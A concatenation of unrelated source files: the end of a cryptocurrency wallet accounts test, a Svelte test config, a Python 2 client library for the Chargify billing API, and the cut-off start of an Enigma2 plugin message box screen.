                node.getreceivedbyaddress(account.addresses[0]), amount_to_send)
            assert_equal(node.getreceivedbyaccount(account.name), amount_to_send)
        # Check that sendfrom account reduces listaccounts balances.
        for i, account in enumerate(accounts):
            to_account = accounts[(i+1) % len(accounts)]
            node.sendfrom(account.name, to_account.receive_address, amount_to_send)
        node.generate(1)
        for account in accounts:
            account.add_receive_address(node.getaccountaddress(account.name))
            account.verify(node)
            assert_equal(node.getreceivedbyaccount(account.name), 2)
            # move clears the per-account balance back into "".
            node.move(account.name, "", node.getbalance(account.name))
            account.verify(node)
        node.generate(101)
        expected_account_balances = {"": 5200}
        for account in accounts:
            expected_account_balances[account.name] = 0
        assert_equal(node.listaccounts(), expected_account_balances)
        assert_equal(node.getbalance(""), 5200)
        # Check that setaccount can assign an account to a new unused address.
        for account in accounts:
            address = node.getaccountaddress("")
            node.setaccount(address, account.name)
            account.add_address(address)
            account.verify(node)
            assert(address not in node.getaddressesbyaccount(""))
        # Check that addmultisigaddress can assign accounts.
        for account in accounts:
            addresses = []
            for x in range(10):
                addresses.append(node.getnewaddress())
            multisig_address = node.addmultisigaddress(5, addresses, account.name)
            account.add_address(multisig_address)
            account.verify(node)
            node.sendfrom("", multisig_address, 50)
        node.generate(101)
        for account in accounts:
            assert_equal(node.getbalance(account.name), 50)
        # Check that setaccount can change the account of an address from a
        # different account.
        change_account(node, accounts[0].addresses[0], accounts[0], accounts[1])
        # Check that setaccount can change the account of an address which
        # is the receiving address of a different account.
        change_account(node, accounts[0].receive_address, accounts[0], accounts[1])
        # Check that setaccount can set the account of an address already
        # in the account. This is a no-op.
        change_account(node, accounts[2].addresses[0], accounts[2], accounts[2])
        # Check that setaccount can set the account of an address which is
        # already the receiving address of the account. It would probably make
        # sense for this to be a no-op, but right now it resets the receiving
        # address, causing getaccountaddress to return a brand new address.
        change_account(node, accounts[2].receive_address, accounts[2], accounts[2])
class Account:
    """Local bookkeeping for one wallet account.

    Tracks the account's name, its current receiving address, and every
    address that has ever been associated with it.
    """

    def __init__(self, name):
        self.name = name                # account label used in RPC calls
        self.receive_address = None     # current receiving address, if any
        self.addresses = []             # all addresses tied to this account

    def add_address(self, address):
        """Record a newly assigned address; it must not already be tracked."""
        assert_equal(address not in self.addresses, True)
        self.addresses.append(address)

    def add_receive_address(self, address):
        """Record *address* and mark it as the current receiving address."""
        self.add_address(address)
        self.receive_address = address

    def verify(self, node):
        """Cross-check this object's bookkeeping against the node's view."""
        if self.receive_address is not None:
            assert self.receive_address in self.addresses
            assert_equal(node.getaccountaddress(self.name), self.receive_address)
        for address in self.addresses:
            assert_equal(node.getaccount(address), self.name)
        assert_equal(
            set(node.getaddressesbyaccount(self.name)), set(self.addresses))
def change_account(node, address, old_account, new_account):
    """Reassign *address* from *old_account* to *new_account* via setaccount,
    updating local bookkeeping and verifying both accounts afterwards."""
    assert_equal(address in old_account.addresses, True)
    node.setaccount(address, new_account.name)
    old_account.addresses.remove(address)
    new_account.add_address(address)
    # Reassigning an account's current receiving address forces the old
    # account to hand out a brand-new receiving address, so refresh it here.
    if address == old_account.receive_address:
        replacement = node.getaccountaddress(old_account.name)
        assert_equal(replacement not in old_account.addresses, True)
        assert_equal(replacement not in new_account.addresses, True)
        old_account.add_receive_address(replacement)
    old_account.verify(node)
    new_account.verify(node)
if __name__ == '__main__':
    # Standard test-framework entry point.
    WalletAccountsTest().main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
import { test } from '../../test';

// Runtime test fixture: asserts the component renders exactly this markup.
// NOTE(review): quote characters appear literally in the output — presumably
// this checks that entity-like text inside elements is not decoded; confirm
// against the component source for this sample.
export default test({
	html: `
		<div>'foo'<span></span></div>
	`
});
|
javascript
|
github
|
https://github.com/sveltejs/svelte
|
packages/svelte/tests/runtime-legacy/samples/html-non-entities-inside-elements/_config.js
|
# -*- coding: utf-8 -*-
'''
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
Created on Nov 20, 2009
Author: Paul Trippett (paul@pyhub.com)
'''
import httplib
import base64
import time
import datetime
import iso8601
import inspect
import logging
from itertools import chain
from xml.dom import minidom
log = logging.getLogger("pychargify")
try:
import json
except Exception, e:
try:
import simplejson as json
except Exception, e:
try:
# For AppEngine users
import django.utils.simplejson as json
except Exception, e:
log.error("No Json library found... Exiting.")
exit()
class ChargifyError(Exception):
    """Base class for all errors raised by this Chargify client.

    @license GNU General Public License
    """
    pass
class ChargifyUnAuthorized(ChargifyError):
    """
    Returned when API authentication has failed.
    @license GNU General Public License
    """
    # Raised for HTTP 401 responses (see ChargifyBase._request).
    pass
class ChargifyForbidden(ChargifyError):
    """
    Returned by valid endpoints in our application that have not been
    enabled for API use.
    @license GNU General Public License
    """
    # Raised for HTTP 403 responses (see ChargifyBase._request).
    pass
class ChargifyNotFound(ChargifyError):
    """
    The requested resource was not found.
    @license GNU General Public License
    """
    # Raised for HTTP 404 responses (see ChargifyBase._request).
    pass
class ChargifyUnProcessableEntity(ChargifyError):
    """
    Sent in response to a POST (create) or PUT (update) request
    that is invalid.
    @license GNU General Public License
    """
    # Raised for HTTP 422 responses (see ChargifyBase._request).
    pass
class ChargifyServerError(ChargifyError):
    """
    Signals some other error
    @license GNU General Public License
    """
    # Raised for HTTP 405 and 500 responses (see ChargifyBase._request).
    pass
class ChargifyBase(object):
    """
    The ChargifyBase class provides a common base for all classes
    in this module
    @license GNU General Public License
    """
    # NOTE(review): this module is Python 2 code (httplib, iteritems,
    # unicode, print statements elsewhere in the file).
    class Meta:
        # Subclasses set `listing` to their REST collection name and
        # `paged` to True when the collection endpoint supports ?page=N.
        listing = None
        paged = False
    # Attribute names that _toxml() must never serialize.
    __ignore__ = ['api_key', 'sub_domain', 'base_host', 'request_host',
                  'id', '__xmlnodename__', 'Meta']
    api_key = ''
    sub_domain = ''
    base_host = '.chargify.com'
    request_host = ''
    def __init__(self, apikey, subdomain):
        """
        Initialize the Class with the API Key and SubDomain for Requests
        to the Chargify API
        """
        self.api_key = apikey
        self.sub_domain = subdomain
        self.request_host = self.sub_domain + self.base_host
    def __get_xml_value(self, nodelist):
        """
        Get the Text Value from an XML Node
        """
        # Concatenates only TEXT_NODE children; element children are ignored.
        rc = ""
        for node in nodelist:
            if node.nodeType == node.TEXT_NODE:
                rc = rc + node.data
        return rc
    def __get_object_from_node(self, node, obj_type=''):
        """
        Copy values from a node into a new Object
        """
        # Resolve the target class by name from this module's globals;
        # defaults to this object's own class when obj_type is empty.
        if obj_type == '':
            constructor = globals()[self.__name__]
        else:
            constructor = globals()[obj_type]
        obj = constructor(self.api_key, self.sub_domain)
        for childnodes in node.childNodes:
            if childnodes.nodeType == 1 and not childnodes.nodeName == '':
                if childnodes.nodeName in self.__attribute_types__:
                    # Nested object: recurse via _applyS on the child's XML.
                    obj.__setattr__(childnodes.nodeName,
                        self._applyS(childnodes.toxml(encoding='utf-8'),
                        self.__attribute_types__[childnodes.nodeName],
                        childnodes.nodeName))
                else:
                    node_value = self.__get_xml_value(childnodes.childNodes)
                    # Chargify tags a type="datetime" attribute on timestamps.
                    if "type" in childnodes.attributes.keys():
                        node_type = childnodes.attributes["type"]
                        if node_value:
                            if node_type.nodeValue == 'datetime':
                                node_value = datetime.datetime.fromtimestamp(
                                    iso8601.parse(node_value))
                    obj.__setattr__(childnodes.nodeName, node_value)
        return obj
    def fix_xml_encoding(self, xml):
        """
        Chargify encodes non-ascii characters in CP1252.
        Decodes and re-encodes with xml characters.
        Strips out whitespace "text nodes".
        """
        # Python 2 only: `unicode` does not exist on Python 3.
        xml = unicode(xml, errors="ignore")
        return unicode(''.join([i.strip() for i in xml.split('\n')])
                       .encode('utf-8', 'xmlcharrefreplace'))
    def _applyS(self, xml, obj_type, node_name):
        """
        Apply the values of the passed xml data to the a class
        """
        # Returns None implicitly when the document does not contain exactly
        # one matching node.
        dom = minidom.parseString(xml)
        nodes = dom.getElementsByTagName(node_name)
        if nodes.length == 1:
            return self.__get_object_from_node(nodes[0], obj_type)
    def _applyA(self, xml, obj_type, node_name):
        """
        Apply the values of the passed data to a new class of the current type
        """
        dom = minidom.parseString(xml)
        nodes = dom.getElementsByTagName(node_name)
        objs = []
        for node in nodes:
            objs.append(self.__get_object_from_node(node, obj_type))
        return objs
    def _toxml(self, dom):
        """
        Return a XML Representation of the object
        """
        log.debug("Converting element to xml....")
        # NOTE(review): instantiates minidom.Element directly instead of
        # dom.createElement(); works with CPython's minidom but bypasses the
        # Document factory — confirm intentional.
        element = minidom.Element(self.__xmlnodename__)
        for property, value in self.__dict__.iteritems():
            if not property in self.__ignore__ and not inspect.isfunction(value):
                if property in self.__attribute_types__:
                    if type(value) == list:
                        node = minidom.Element(property)
                        node.setAttribute('type', 'array')
                        for v in value:
                            child = v._toxml(dom)
                            if child is not None:
                                node.appendChild(child)
                        element.appendChild(node)
                    else:
                        log.debug("Adding element: %s (value: %s)" % (property, value))
                        # NOTE(review): bare except silently drops any child
                        # that fails to serialize — deliberate best-effort?
                        try:
                            element.appendChild(value._toxml(dom))
                            log.debug("New element contents: %s", element.toprettyxml())
                        except:
                            pass
                else:
                    node = minidom.Element(property)
                    node_txt = dom.createTextNode(str(value).encode('ascii', 'xmlcharrefreplace'))
                    node.appendChild(node_txt)
                    element.appendChild(node)
        return element
    def _get(self, url):
        """
        Handle HTTP GETs to the API
        """
        return self._request('GET', url)
    def _post(self, url, data):
        """
        Handle HTTP POST's to the API
        """
        return self._request('POST', url, data)
    def _put(self, url, data):
        """
        Handle HTTP PUT's to the API
        """
        return self._request('PUT', url, data)
    def _delete(self, url, data):
        """
        Handle HTTP DELETE's to the API
        """
        return self._request('DELETE', url, data)
    def _request(self, method, url, data=None):
        """
        Handled the request and sends it to the server
        """
        # Raises one of the ChargifyError subclasses on 401/403/404/422/405/500;
        # otherwise returns the response body re-encoded by fix_xml_encoding().
        http = httplib.HTTPSConnection(self.request_host)
        http.putrequest(method, url)
        http.putheader("Authorization", "Basic %s" % self._get_auth_string())
        http.putheader("User-Agent", "pychargify")
        http.putheader("Host", self.request_host)
        http.putheader("Accept", "application/xml")
        if data:
            http.putheader("Content-Length", str(len(data)))
            http.putheader("Content-Type", 'text/xml; charset="UTF-8"')
        http.endheaders()
        log.debug('url: %s' % url)
        log.debug('sending: %s' % data)
        if data:
            http.send(data)
        response = http.getresponse()
        r = response.read()
        log.debug('got: %s' % r)
        # Unauthorized Error
        if response.status == 401:
            raise ChargifyUnAuthorized()
        # Forbidden Error
        elif response.status == 403:
            raise ChargifyForbidden()
        # Not Found Error
        elif response.status == 404:
            raise ChargifyNotFound()
        # Unprocessable Entity Error
        elif response.status == 422:
            print data
            print r
            raise ChargifyUnProcessableEntity()
        # Generic Server Errors
        elif response.status in [405, 500]:
            log.debug('response status: %s' % response.status)
            log.debug('response reason: %s' % response.reason)
            raise ChargifyServerError()
        return self.fix_xml_encoding(r)
    def _save(self, url, node_name):
        """
        Save the object using the passed URL as the API end point
        """
        # Returns a (success, obj) tuple; "success" is a heuristic that the
        # server-side updated_at date matches today's date.
        dom = minidom.Document()
        dom.appendChild(self._toxml(dom))
        request_made = {
            'day': datetime.datetime.today().day,
            'month': datetime.datetime.today().month,
            'year': datetime.datetime.today().year
        }
        # An existing id means update (PUT); otherwise create (POST).
        if self.id not in [None, 'None']:
            id = str(self.id)
            obj = self._applyS(self._put('/' + url + '/' + id + '.xml', dom.toxml(encoding="utf-8")), self.__name__, node_name)
            if obj:
                if type(obj.updated_at) == datetime.datetime:
                    if (obj.updated_at.day == request_made['day']) and \
                       (obj.updated_at.month == request_made['month']) and \
                       (obj.updated_at.year == request_made['year']):
                        self.saved = True
                        return (True, obj)
            return (False, obj)
        else:
            obj = self._applyS(self._post('/' + url + '.xml',
                dom.toxml(encoding="utf-8")), self.__name__, node_name)
            if obj:
                if type(obj.updated_at) == datetime.datetime:
                    if (obj.updated_at.day == request_made['day']) and \
                       (obj.updated_at.month == request_made['month']) and \
                       (obj.updated_at.year == request_made['year']):
                        return (True, obj)
            return (False, obj)
    def _get_auth_string(self):
        # HTTP Basic auth: the API key is the username, "x" the password.
        return base64.encodestring('%s:%s' % (self.api_key, 'x'))[:-1]
    def getAll(self):
        # Fetch every object in the collection, following ?page=N pagination
        # when Meta.paged is set; stops on the first empty page.
        if self.Meta.listing:
            rv = []
            do_paging = getattr(self.Meta, "paged", False)
            page = 1
            while True:
                url = '/%s.xml' % self.Meta.listing
                if do_paging:
                    url += '?page=%s' % page
                    page += 1
                vals = self._applyA(self._get(url), self.__name__, self.__xmlnodename__)
                rv.extend(vals)
                if not do_paging or not vals: break
            return rv
        raise NotImplementedError('Subclass is missing Meta class attribute listing')
    def getById(self, id):
        # Fetch one object by numeric/string id.
        if self.Meta.listing:
            return self._applyS(self._get('/%s/%s.xml' % (self.Meta.listing, str(id))),
                                self.__name__, self.__xmlnodename__)
        raise NotImplementedError('Subclass is missing Meta class attribute listing')
    def __get_by_attribute__(self, key, value):
        # Fetch one object via the /lookup.xml?key=value endpoint.
        if self.Meta.listing:
            return self._applyS(self._get('/%s/lookup.xml?%s=%s' %(self.Meta.listing,
                                str(key), str(value))), self.__name__, self.__xmlnodename__)
        raise NotImplementedError('Subclass is missing Meta class attribute listing')
    def save(self):
        # Create or update this object (see _save for the return contract).
        if self.Meta.listing:
            return self._save(self.Meta.listing, self.__xmlnodename__)
        raise NotImplementedError('Subclass is missing Meta class attribute listing')
class CompoundKeyMixin:
    # Mixin for resources addressed by two ids, e.g.
    # /subscriptions/<parent_id>/components/<sub_id>.xml.
    def getByCompoundKey(self, parent_id, sub_id):
        # Meta.compound_key holds the two collection names; an optional third
        # element names a sub-collection suffix, in which case a LIST is
        # fetched (_applyA) instead of a single object (_applyS).
        if 'compound_key' in self.Meta.__dict__.keys():
            _cb, _a = (self._applyA, ('/%s' % self.Meta.compound_key[2])) \
                if len(self.Meta.compound_key) == 3 else (self._applyS, '')
            return _cb(self._get('/%s.xml' % ('/'.join(['%s/%s' % i
                       for i in zip(self.Meta.compound_key[:2],
                                    (str(parent_id), str(sub_id)))]) + _a)),
                       self.__name__, self.__xmlnodename__)
        raise NotImplementedError('Subclass is missing Meta class attribute compound key')
class ChargifyCustomer(ChargifyBase):
    """
    Represents Chargify Customers
    @license GNU General Public License
    """
    class Meta:
        paged = True
        listing = 'customers'
    __name__ = 'ChargifyCustomer'
    __attribute_types__ = {}
    __xmlnodename__ = 'customer'
    id = None
    first_name = ''
    last_name = ''
    email = ''
    organization = ''
    reference = ''
    created_at = None
    modified_at = None
    def __init__(self, apikey, subdomain):
        super(ChargifyCustomer, self).__init__(apikey, subdomain)
        # Per-instance shortcut: look a customer up by its `reference` field.
        self.getByReference = lambda v: self.__get_by_attribute__('reference', v)
    def getSubscriptions(self):
        # All subscriptions belonging to this customer.
        obj = ChargifySubscription(self.api_key, self.sub_domain)
        return obj.getByCustomerId(self.id)
    def _toxml(self, dom):
        """
        Return a XML Representation of the object
        """
        # An existing customer is referenced by <customer_id> only; a new
        # customer serializes all attributes via the base implementation.
        if self.id not in [None, 'None']:
            element = minidom.Element("customer_id")
            node_txt = dom.createTextNode(str(self.id))
            element.appendChild(node_txt)
            return element
        else:
            return super(ChargifyCustomer, self)._toxml(dom)
class CustomerAttributes(ChargifyCustomer):
    # Identical to ChargifyCustomer but serialized under the
    # <customer_attributes> node — presumably for nesting inside other
    # request bodies; confirm against Chargify API docs.
    __xmlnodename__ = 'customer_attributes'
class ChargifyProductFamily(ChargifyBase):
    """
    Represents Chargify Product Families
    @license GNU General Public License
    """
    class Meta:
        listing = 'product_families'
    __name__ = 'ChargifyProductFamily'
    __attribute_types__ = {}
    __xmlnodename__ = 'product_family'
    id = None
    accounting_code = None
    description = ''
    handle = ''
    name = ''
    def getComponents(self):
        # All components defined under this product family.
        obj = ChargifyProductFamilyComponent(self.api_key, self.sub_domain)
        return obj.getByProductFamilyId(self.id)
class ChargifyProductFamilyComponent(ChargifyBase):
    # A metered/quantity component attached to a product family.
    __name__ = 'ChargifyProductFamilyComponent'
    __attribute_types__ = {}
    __xmlnodename__ = 'component'
    class Meta:
        listing = 'components'
    id = None
    name = ''
    kind = ''
    product_family_id = 0
    price_per_unit_in_cents = 0
    pricing_scheme = ''
    unit_name = None
    updated_at = None
    created_at = None
    def getByProductFamilyId(self, id):
        # List every component of the given product family.
        return self._applyA(self._get('/product_families/' + str(id) + '/components.xml'),
                            self.__name__, self.__xmlnodename__)
    def getByIds(self, product_family_id, id):
        # Fetch the family's component list and pick the one whose id matches.
        # NOTE: ids parsed from XML are strings, hence the str(id) comparison.
        result = None
        url = '/product_families/' + str(product_family_id) + '/components.xml'
        components = self._applyA(
            self._get(url), self.__name__, self.__xmlnodename__)
        if components:
            filtered = filter(lambda c: c.id==str(id), components)
            if len(filtered) > 0:
                result = filtered[0]
        return result
class ChargifyProduct(ChargifyBase):
    """
    Represents Chargify Products
    @license GNU General Public License
    """
    class Meta:
        listing = 'products'
    __name__ = 'ChargifyProduct'
    # Nested XML elements that deserialize into their own objects.
    __attribute_types__ = {
        'product_family': 'ChargifyProductFamily',
    }
    __xmlnodename__ = 'product'
    id = None
    price_in_cents = 0
    name = ''
    handle = ''
    product_family = None
    accounting_code = ''
    interval_unit = ''
    interval = 0
    def getByHandle(self, handle):
        # Look a product up by its handle instead of its numeric id.
        return self._applyS(self._get('/products/handle/' + str(handle) +
                            '.xml'), self.__name__, self.__xmlnodename__)
    def getPaymentPageUrl(self):
        # Hosted signup page URL for this product.
        return ('https://' + self.request_host + '/h/' +
                self.id + '/subscriptions/new')
    def getPriceInDollars(self):
        # Cents -> dollars, rounded to 2 decimal places.
        return round(float(self.price_in_cents) / 100, 2)
    def getFormattedPrice(self):
        # Dollar price formatted as a display string, e.g. "$9.99".
        return "$%.2f" % (self.getPriceInDollars())
class ChargifySubscription(ChargifyBase):
    """
    Represents Chargify Subscriptions
    @license GNU General Public License
    """
    class Meta:
        listing = 'subscriptions'
        paged = True
    __name__ = 'ChargifySubscription'
    # Nested XML elements that deserialize into their own objects.
    __attribute_types__ = {
        'customer': 'ChargifyCustomer',
        'product': 'ChargifyProduct',
        'credit_card': 'ChargifyCreditCard',
        'components': 'ChargifySubscriptionComponent',
    }
    __xmlnodename__ = 'subscription'
    id = None
    state = ''
    coupon_code = ''
    balance_in_cents = 0
    current_period_started_at = None
    current_period_ends_at = None
    trial_started_at = None
    # NOTE(review): attribute name looks like a duplicated-paste typo for
    # "trial_ended_at"; renaming would change the public interface, so it is
    # left as-is — confirm whether any caller relies on it.
    trial_ended_attrial_ended_at = None
    activated_at = None
    expires_at = None
    created_at = None
    updated_at = None
    customer = None
    customer_reference = ''
    product = None
    product_handle = ''
    credit_card = None
    components = None
    def getComponents(self):
        """
        Gets the subscription components
        """
        if self.id not in [None, 'None']:
            obj = ChargifySubscriptionComponent(self.api_key, self.sub_domain)
            return obj.getBySubscriptionId(self.id)
    def getComponent(self, component_id):
        """
        Gets a subscription component..
        """
        obj = ChargifySubscriptionComponent(self.api_key, self.sub_domain)
        return obj.getByCompoundKey(self.id, component_id)
    def getByCustomerId(self, customer_id):
        # All subscriptions belonging to one customer.
        return self._applyA(self._get('/customers/' + str(customer_id) +
                            '/subscriptions.xml'), self.__name__, 'subscription')
    def getBySubscriptionId(self, subscription_id):
        #Throws error if more than element is returned
        # (single-element tuple unpack enforces exactly one result).
        i, = self._applyA(self._get('/subscriptions/' + str(subscription_id) +
                          '.xml'), self.__name__, 'subscription')
        return i
    def resetBalance(self):
        # Zero out the subscription's balance.
        self._put("/subscriptions/" + self.id + "/reset_balance.xml", '')
    def reactivate(self):
        # Reactivate a cancelled/expired subscription.
        self._put("/subscriptions/" + self.id + "/reactivate.xml", "")
    def upgrade(self, toProductHandle):
        # Migrate the subscription to a different product by handle.
        xml = """<?xml version="1.0" encoding="UTF-8"?>
        <subscription>
          <product_handle>%s</product_handle>
        </subscription>""" % (toProductHandle)
        #end improper indentation
        return self._applyS(self._put("/subscriptions/" + self.id + ".xml",
            xml), self.__name__, "subscription")
    def unsubscribe(self, message):
        # Cancel the subscription with a cancellation message.
        xml = """<?xml version="1.0" encoding="UTF-8"?>
        <subscription>
          <cancellation_message>
            %s
          </cancellation_message>
        </subscription>""" % (message)
        self._delete("/subscriptions/" + self.id + ".xml", xml)
    def charge(self, amount, memo):
        # Apply a one-time charge to the subscription.
        xml = """<?xml version="1.0" encoding="UTF-8"?>
        <charge>
          <amount>%s</amount>
          <memo>%s</memo>
        </charge>""" % (amount, memo)
        self._post('/subscriptions/' + self.id + '/charges.xml', xml)
class ChargifyCreditCard(ChargifyBase):
    """
    Represents Chargify Credit Cards
    """
    __name__ = 'ChargifyCreditCard'
    __attribute_types__ = {}
    __xmlnodename__ = 'credit_card_attributes'
    # Card holder and card details.
    first_name = ''
    last_name = ''
    full_number = ''
    masked_card_number = ''
    expiration_month = ''
    expiration_year = ''
    cvv = ''
    type = ''
    # Billing address details.
    billing_address = ''
    billing_city = ''
    billing_state = ''
    billing_zip = ''
    billing_country = ''

    def save(self, subscription):
        """Persist the card attributes onto the given subscription via PUT."""
        path = "/subscriptions/%s.xml" % (subscription.id)
        fields = []
        for key, value in self.__dict__.items():
            if key.startswith('_') or key in self.__ignore__:
                continue
            fields.append(u'<%s>%s</%s>' % (key, value, key))
        data = u'<?xml version="1.0" encoding="UTF-8"?><subscription><credit_card_attributes>%s</credit_card_attributes></subscription>' % (
            ''.join(fields))
        return self._applyS(self._put(path, data),
                            self.__name__, "subscription")
class ChargifySubscriptionComponent(ChargifyBase, CompoundKeyMixin):
    """
    Represents Chargify Subscription Component
    """
    class Meta:
        # Compound REST path: /subscriptions/<id>/components/<id>
        compound_key = ('subscriptions', 'components')
    __name__ = 'ChargifySubscriptionComponent'
    __attribute_types__ = {}
    __xmlnodename__ = 'component'
    component_id = None
    subscription_id = None
    name = ''
    kind = ''
    unit_name = None
    unit_balance = 0  # metered-component
    allocated_quantity = 0  # quantity-based-component
    pricing_scheme = ''  # quantity-based-component
    enabled = False  # on-off-component

    def _toxml(self, dom):
        """
        Return a XML Representation of the object, or None when there is
        nothing to serialize (metered components, or a falsy value).
        """
        if self.kind == 'metered_component':
            return None
        # Renamed local from 'property' to avoid shadowing the builtin.
        if self.kind == 'on_off_component':
            attr_name = 'enabled'
        else:
            attr_name = 'allocated_quantity'
        value = getattr(self, attr_name)
        if not value:
            return None
        # NOTE(review): minidom.Element is instantiated directly instead of
        # dom.createElement(); presumably works with the writer used here --
        # confirm against the serialization code.
        element = minidom.Element(self.__xmlnodename__)
        node = minidom.Element('component_id')
        node_txt = dom.createTextNode(str(self.component_id))
        node.appendChild(node_txt)
        element.appendChild(node)
        node = minidom.Element(attr_name)
        node_txt = dom.createTextNode(str(value))
        node.appendChild(node_txt)
        element.appendChild(node)
        return element

    def getBySubscriptionId(self, id):
        """Return all components attached to the given subscription."""
        return self._applyA(self._get('/subscriptions/' + str(id) + '/components.xml'),
                            self.__name__, self.__xmlnodename__)

    def updateQuantity(self, quantity):
        """
        Sets the quantity allocation for a given component id.
        """
        if self.component_id is None or self.subscription_id is None:
            raise ChargifyError()
        if self.kind != 'quantity_based_component':
            raise ChargifyError()
        self.allocated_quantity = quantity
        # %d requires an integer quantity.
        data = '''<?xml version="1.0" encoding="UTF-8"?><component>
<allocated_quantity type="integer">%d</allocated_quantity>
</component>''' % self.allocated_quantity
        # Parse the response so a malformed reply raises immediately.
        dom = minidom.parseString(self.fix_xml_encoding(
            self._put('/subscriptions/%s/components/%s.xml' % (
                str(self.subscription_id), str(self.component_id)), data)
        ))

    def updateOnOff(self, enable):
        """
        Sets the enabled attr for a given component id.
        """
        if self.component_id is None or self.subscription_id is None:
            raise ChargifyError()
        if self.kind != 'on_off_component':
            raise ChargifyError()
        # BUGFIX: was 'self.enabled = enabled' (NameError) -- the parameter
        # is named 'enable'.
        self.enabled = enable
        # NOTE(review): the tag below says <allocated_quantity> even though it
        # carries the on/off flag; left unchanged -- verify against the
        # Chargify components API before renaming it to <enabled>.
        data = '''<?xml version="1.0" encoding="UTF-8"?><component>
<allocated_quantity>%s</allocated_quantity>
</component>''' % self.enabled
        dom = minidom.parseString(self.fix_xml_encoding(
            self._put('/subscriptions/%s/components/%s.xml' % (
                str(self.subscription_id), str(self.component_id)), data)
        ))

    def getUsages(self):
        """
        Gets the subscription component usages
        """
        if self.component_id is None or self.subscription_id is None:
            raise ChargifyError()
        if self.kind != 'metered_component':
            raise ChargifyError()
        obj = ChargifyComponentUsage(self.api_key, self.sub_domain)
        return obj.getByCompoundKey(self.subscription_id, self.component_id)

    def createUsage(self, quantity, memo=None):
        """
        Creates metered usage for a given component id.
        """
        if self.component_id is None or self.subscription_id is None:
            raise ChargifyError()
        if self.kind != 'metered_component':
            raise ChargifyError()
        data = '''<?xml version="1.0" encoding="UTF-8"?><usage>
<quantity>%d</quantity><memo>%s</memo></usage>''' % (
            quantity, memo or "")
        return self._applyA(
            self._post('/subscriptions/%s/components/%s/usages.xml' % (
                str(self.subscription_id), str(self.component_id)), data),
            ChargifyComponentUsage.__name__,
            ChargifyComponentUsage.__xmlnodename__)
class ChargifyComponentUsage(ChargifyBase, CompoundKeyMixin):
    """
    Represents Chargify Subscription Component Usage
    """
    class Meta:
        # Compound REST path: /subscriptions/<id>/components/<id>/usages
        compound_key = ('subscriptions', 'components', 'usages')
    __name__ = 'ChargifyComponentUsage'
    __attribute_types__ = {}
    __xmlnodename__ = 'usage'
    # Usage record fields, populated from the API response.
    id = None
    quantity = 0
    memo = ''
class ChargifyPostBack(ChargifyBase):
    """
    Represents Chargify API Post Backs
    @license GNU General Public License
    """
    # Class-level default kept for backward compatibility; every instance
    # gets its own list in __init__ so instances no longer share state.
    subscriptions = []

    def __init__(self, apikey, subdomain, postback_data):
        """Fetch the subscriptions referenced by a post-back payload.

        postback_data is a JSON array of subscription ids; when falsy,
        no fetching happens.
        """
        # BUGFIX: the unbound base-class call was missing 'self'.
        ChargifyBase.__init__(self, apikey, subdomain)
        # BUGFIX: bind a fresh list per instance instead of mutating the
        # shared class attribute.
        self.subscriptions = []
        if postback_data:
            self._process_postback_data(postback_data)

    def _process_postback_data(self, data):
        """
        Process the Json array and fetches the Subscription Objects
        """
        csub = ChargifySubscription(self.api_key, self.sub_domain)
        for obj in json.loads(data):
            self.subscriptions.append(csub.getBySubscriptionId(obj))
class Chargify:
    """
    The Chargify class provides the main entry point to the Charify API
    @license GNU General Public License
    """
    api_key = ''
    sub_domain = ''

    def __init__(self, apikey, subdomain):
        # Credentials shared by every resource wrapper created below.
        self.api_key = apikey
        self.sub_domain = subdomain

    # -- plural accessors: each access returns a fresh resource wrapper ----
    @property
    def Customers(self):
        return ChargifyCustomer(self.api_key, self.sub_domain)

    @property
    def Products(self):
        return ChargifyProduct(self.api_key, self.sub_domain)

    @property
    def Components(self):
        return ChargifyProductFamilyComponent(self.api_key, self.sub_domain)

    @property
    def ProductFamilies(self):
        return ChargifyProductFamily(self.api_key, self.sub_domain)

    @property
    def Subscriptions(self):
        return ChargifySubscription(self.api_key, self.sub_domain)

    @property
    def SubscriptionComponents(self):
        return ChargifySubscriptionComponent(self.api_key, self.sub_domain)

    @property
    def ComponentUsages(self):
        return ChargifyComponentUsage(self.api_key, self.sub_domain)

    # -- singular factory methods, kept for backward compatibility ---------
    def Customer(self):
        return self.Customers

    def CustomerAttributes(self):
        return CustomerAttributes(self.api_key, self.sub_domain)

    def Product(self):
        return self.Products

    def Component(self):
        return self.Components

    def ProductFamily(self):
        return self.ProductFamilies

    def Subscription(self):
        return self.Subscriptions

    def SubscriptionComponent(self):
        return self.SubscriptionComponents

    def ComponentUsage(self):
        return self.ComponentUsages

    def CreditCard(self):
        return ChargifyCreditCard(self.api_key, self.sub_domain)

    def PostBack(self, postbackdata):
        return ChargifyPostBack(self.api_key, self.sub_domain, postbackdata)
|
unknown
|
codeparrot/codeparrot-clean
| ||
from enigma import *
from Screens.Screen import Screen
from Components.ActionMap import ActionMap
from Components.Sources.List import List
from Tools.Directories import resolveFilename, SCOPE_CURRENT_PLUGIN
from Tools.LoadPixmap import LoadPixmap
from Components.Label import Label
def MessageBoxEntry(name, picture):
    """Build a (pixmap, name) list entry, falling back to the empty icon."""
    pixmap = LoadPixmap(cached=True,
                        path=resolveFilename(SCOPE_CURRENT_PLUGIN,
                                             "SystemPlugins/DeviceManager/icons/" + picture))
    if not pixmap:
        pixmap = LoadPixmap(cached=True,
                            path=resolveFilename(SCOPE_CURRENT_PLUGIN,
                                                 "SystemPlugins/DeviceManager/icons/empty.png"))
    return (pixmap, name)
class ExtraMessageBox(Screen):
    """Message box showing an icon+text choice list with an optional countdown.

    close() receives the index of the chosen entry; when the user cancels,
    `exitid` (if >= 0) is reported instead.
    """
    # Embedded skin; the <applet> code runs on layout-finish and resizes the
    # window to fit the message label plus up to 7 visible list rows.
    skin = """
<screen name="ExtraMessageBox" position="center,center" size="460,430" title=" ">
<widget name="message" position="10,10" size="440,25" font="Regular;20" />
<widget source="menu" render="Listbox" position="20,90" size="420,360" scrollbarMode="showOnDemand">
<convert type="TemplatedMultiContent">
{"template": [
MultiContentEntryPixmapAlphaTest(pos = (5, 0), size = (48, 48), png = 0),
